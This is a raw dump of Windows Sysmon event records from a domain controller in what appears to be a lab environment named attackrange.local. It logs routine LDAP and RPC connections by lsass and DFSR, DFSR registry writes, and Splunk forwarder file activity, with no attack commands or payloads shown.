12:11:15.642{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53739-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.636{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53738-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.636{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53738-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.626{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53737-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.626{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53737-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.616{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53736-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 
354300x800000000000000011598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:15.616{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53736-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 13241300x800000000000000011597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:16.228{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x800000000000000011596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:16.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Config SourceDWORD (0x00000001) 13241300x800000000000000011595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:11:16.212{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_D1286CDE-9764-40EF-8307-AEB9B8BDF7DB.XML 23542300x800000000000000011594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.212{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FDB88912528EC3773FBC41D75D7DB07,SHA256=17D6E9D139F71D15B888A537163DBF09439FE94F05E68530FCB3EBF121C9A033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:17.962{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C479F8F8065A05663B4EB41DAF1C781,SHA256=247617C58ADC5DA634E0889D0A26D91AB90CA0C6DE4105DDFA183438047A7627,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.654{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53742-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.654{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53742-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.647{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53741-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000011609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.646{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53741-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x800000000000000011608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:17.243{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5653A52F646D9CDEC3911C6CE7C2F705,SHA256=0204A28A07C88DB2F20CDC4EEB1D843CA06FDD99D59D4756026FFBD26F2D4BF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:16.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53740-false10.0.1.12-8000- 23542300x800000000000000011614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:18.978{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0D291538DC353210103FB63DC3770E,SHA256=8280B8807E1B610B8D8C712AEFD39AAC7C6BC523045193A2D9F97C2EE27372A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:19.993{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4098B7438395D8001ACFC98A9B4CEBF9,SHA256=04980D4730D48DE727188608AC78C5D93EC34CCA53E0D55DDF53ADBEADE2D3D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:21.009{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F0AA4EFF2A8CBB5FE686FA9CD309D9,SHA256=54484C12EF652B044A10F089A21591445010441ED5FC812CE2A8D47F7224BC6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:21.646{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53743-false10.0.1.12-8000- 23542300x800000000000000011617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:22.009{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCFC736397956F24DFCDD1CDFB3D69C8,SHA256=6ACE645FABD2037E528E8EA63A9142E14E0CE1437561D70550B9DF64AD457669,IMPHASH=00000000000000000000000000000000falsetrue